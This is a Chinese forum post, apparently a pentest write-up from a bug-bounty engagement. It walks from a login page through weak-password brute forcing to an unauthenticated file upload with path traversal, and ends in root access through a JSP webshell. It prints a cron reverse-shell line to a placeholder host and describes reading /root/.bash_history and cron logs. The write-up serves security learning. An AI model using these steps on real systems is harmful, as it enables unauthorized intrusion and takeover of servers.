找回密码
立即注册
搜索
热搜: Java Python Linux Go
发回帖 发新帖

5018

积分

0

好友

665

主题
发表于 5 小时前 | 查看: 6| 回复: 0

在某次众测项目中,开局只有一个登录框,本以为希望渺茫。经过一系列常规测试,最终成功获取系统权限。下面记录一下整个过程。

接口未授权挖掘

在未登录的情况下,我们无法知晓后台接口。通常的做法是分析JS文件、进行路径扫描来收集潜在端点。收集到一批URL后,使用Burp的Intruder模块进行批量扫描,探测GET和POST请求。观察响应包的状态码和内容,如果发现存在未授权访问的接口,就可以进一步构造数据包进行测试。

HTTP请求与告警数据接口截图

突破登录框

测试中常常不提供测试账号,这时就需要尝试爆破。有时会遇到验证码(重新发送登录包,有50%的可能是假验证码),但这次目标站点恰好没有验证码。

目标系统登录界面

拿到这种登录框,首先要判断是否存在用户名枚举漏洞。尝试adminadmin321等常见账号,观察系统返回的提示信息差异。即使发现了admin账号,也可能存在密码错误锁定策略,这时可以转而爆破其他账号(手机号或常规账号,通常存在测试账号或有人设置弱口令)。

根据响应包长度进行判断,将密码设置为弱口令123456,使用账号字典进行爆破。最终成功获取到一个测试账号的凭证,完成了初步的安全测试突破。

Burp Suite爆破结果与响应包长度对比

后台漏洞挖掘

使用测试账号进入后台后,重点留意接口和上传/下载功能点。由于没有源代码,只能通过浏览各个功能页面,并借助Burp插件Autorize来探测哪些接口存在未授权访问。在翻找过程中,发现了一个正常的文件上传点。

后台文件管理界面,包含上传功能

构造请求上传一个txt文件,发现这个功能是先上传文件,然后可以读取其内容。

浏览器开发者工具网络面板,显示上传与读取文件的请求

尝试删除请求中的Cookie凭证,发现依然可以成功上传,这说明该接口存在未授权访问问题。

删除Cookie后的文件上传请求与成功响应

至此,这已经是一个前台的上传漏洞了。进一步测试发现,serverFileName参数存在目录穿越,可以控制上传路径,并且读取文件的接口也存在同样的路径穿越问题。

利用目录穿越上传文件至/tmp目录的请求与响应

根据接口特征判断,该网站可能是SpringBoot架构,直接上传JSP文件大概率无法解析。剩下两种拿权限的思路:一是上传SSH密钥,二是写入定时任务反弹Shell。扫描目标IP发现SSH端口未对外开放,于是尝试写入定时任务。

* * * * * bash -i >& /dev/tcp/your_ip/port 0>&1

等待了几分钟,反弹Shell没有成功。于是通过文件读取漏洞查看定时任务日志(/var/log/cron)。

通过文件读取接口获取的Cron日志内容

发现最近的日志记录是在前一天,可能服务器时间不同步,或者定时任务服务(crond)在前一天被停止了。再次尝试写入一个简单的测试任务:

* * * * * whoami > /tmp/data.txt

之后仍然无法读取到/tmp/data.txt文件,基本确定定时任务服务没有运行,此路不通。

柳暗花明

难道真的无法GetShell了吗?我们转换思路,利用文件读取漏洞,尝试读取/root/.bash_history文件,寻找网站路径等敏感信息。

通过漏洞读取到的bash历史命令,发现webapps路径

看到了webapps路径,瞬间有了希望。这很可能是一个Tomcat目录。于是直接构造上传路径,将JSPWebShell写入到webapps目录下。

利用目录穿越将JSP WebShell上传至webapps目录的请求

使用哥斯拉连接上传的WebShell,成功执行命令,获取了root权限。

哥斯拉连接成功,执行whoami命令返回root

通过WebShell检查网站目录结构,发现这是一个Tomcat,里面有一个目录部署着SpringBoot应用,但网站本身并没有其他JSP文件。

通过WebShell文件管理器查看到的网站目录结构

这种将SpringBoot应用以WAR包形式部署在Tomcat下的方式比较少见。由于利用了未授权的上传点,最终实现了前台的远程代码执行(RCE)。这个案例也提醒我们,在安全/渗透测试中,组合利用多个看似低危的漏洞,往往能打开通往内网的大门。如果你有类似的技术思考或实战经验,欢迎在云栈社区与大家交流探讨。




上一篇:基于Firefox与BiDi协议的开源非CDP自动化框架,专为高风控场景设计
下一篇:Go并发编程三件套实战指南:Worker Pool、Pipeline与扇入扇出模式
您需要登录后才可以回帖 登录 | 立即注册

手机版|小黑屋|网站地图|云栈社区 ( 苏ICP备2022046150号-2 )

GMT+8, 2026-4-8 23:09 , Processed in 0.708103 second(s), 42 queries , Gzip On.

Powered by Discuz! X3.5

© 2025-2026 云栈社区.

快速回复 返回顶部 返回列表